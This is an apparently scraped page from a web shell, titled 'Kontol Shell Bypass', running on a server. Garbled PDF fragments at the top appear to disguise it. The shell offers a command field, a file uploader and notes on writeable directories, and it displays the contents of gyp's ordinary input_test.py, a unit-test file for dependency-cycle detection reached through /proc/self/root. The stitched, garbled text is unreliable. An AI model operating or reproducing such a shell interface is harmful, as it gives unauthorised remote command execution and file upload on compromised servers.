%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/self/root/usr/local/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/self/root/usr/local/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/input_test.py
#!/usr/bin/env python3

# Copyright 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Unit tests for the input.py file."""

import gyp.input
import unittest


class TestFindCycles(unittest.TestCase):
    def setUp(self):
        self.nodes = {}
        for x in ("a", "b", "c", "d", "e"):
            self.nodes[x] = gyp.input.DependencyGraphNode(x)

    def _create_dependency(self, dependent, dependency):
        dependent.dependencies.append(dependency)
        dependency.dependents.append(dependent)

    def test_no_cycle_empty_graph(self):
        for label, node in self.nodes.items():
            self.assertEqual([], node.FindCycles())

    def test_no_cycle_line(self):
        self._create_dependency(self.nodes["a"], self.nodes["b"])
        self._create_dependency(self.nodes["b"], self.nodes["c"])
        self._create_dependency(self.nodes["c"], self.nodes["d"])

        for label, node in self.nodes.items():
            self.assertEqual([], node.FindCycles())

    def test_no_cycle_dag(self):
        self._create_dependency(self.nodes["a"], self.nodes["b"])
        self._create_dependency(self.nodes["a"], self.nodes["c"])
        self._create_dependency(self.nodes["b"], self.nodes["c"])

        for label, node in self.nodes.items():
            self.assertEqual([], node.FindCycles())

    def test_cycle_self_reference(self):
        self._create_dependency(self.nodes["a"], self.nodes["a"])

        self.assertEqual(
            [[self.nodes["a"], self.nodes["a"]]], self.nodes["a"].FindCycles()
        )

    def test_cycle_two_nodes(self):
        self._create_dependency(self.nodes["a"], self.nodes["b"])
        self._create_dependency(self.nodes["b"], self.nodes["a"])

        self.assertEqual(
            [[self.nodes["a"], self.nodes["b"], self.nodes["a"]]],
            self.nodes["a"].FindCycles(),
        )
        self.assertEqual(
            [[self.nodes["b"], self.nodes["a"], self.nodes["b"]]],
            self.nodes["b"].FindCycles(),
        )

    def test_two_cycles(self):
        self._create_dependency(self.nodes["a"], self.nodes["b"])
        self._create_dependency(self.nodes["b"], self.nodes["a"])

        self._create_dependency(self.nodes["b"], self.nodes["c"])
        self._create_dependency(self.nodes["c"], self.nodes["b"])

        cycles = self.nodes["a"].FindCycles()
        self.assertTrue([self.nodes["a"], self.nodes["b"], self.nodes["a"]] in cycles)
        self.assertTrue([self.nodes["b"], self.nodes["c"], self.nodes["b"]] in cycles)
        self.assertEqual(2, len(cycles))

    def test_big_cycle(self):
        self._create_dependency(self.nodes["a"], self.nodes["b"])
        self._create_dependency(self.nodes["b"], self.nodes["c"])
        self._create_dependency(self.nodes["c"], self.nodes["d"])
        self._create_dependency(self.nodes["d"], self.nodes["e"])
        self._create_dependency(self.nodes["e"], self.nodes["a"])

        self.assertEqual(
            [
                [
                    self.nodes["a"],
                    self.nodes["b"],
                    self.nodes["c"],
                    self.nodes["d"],
                    self.nodes["e"],
                    self.nodes["a"],
                ]
            ],
            self.nodes["a"].FindCycles(),
        )


if __name__ == "__main__":
    unittest.main()

Kontol Shell Bypass